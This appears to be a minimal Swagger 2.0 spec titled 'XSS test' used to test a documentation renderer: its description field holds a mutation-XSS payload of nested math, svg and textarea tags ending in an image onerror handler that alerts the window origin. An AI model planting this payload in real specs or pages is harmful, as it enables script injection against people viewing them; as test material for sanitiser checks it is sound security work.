swagger: '2.0'
info:
  title: XSS test
  description:   <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
  version: production
